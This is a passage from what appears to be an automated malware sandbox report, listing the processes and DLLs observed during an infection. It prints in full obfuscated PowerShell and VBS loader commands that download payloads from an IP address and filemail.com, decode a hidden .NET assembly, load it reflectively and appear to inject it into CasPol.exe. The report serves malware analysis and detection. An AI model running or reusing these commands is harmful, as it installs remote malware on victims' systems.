eVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES59C4.tmp" "c:\Users\user\AppData\Local\Temp\cfogy1ty\CSCDB27D48C833B4E44BF14917DCA05AE4.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES59C4.tmp" "c:\Users\user\AppData\Local\Temp\cfogy1ty\CSCDB27D48C833B4E44BF14917DCA05AE4.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
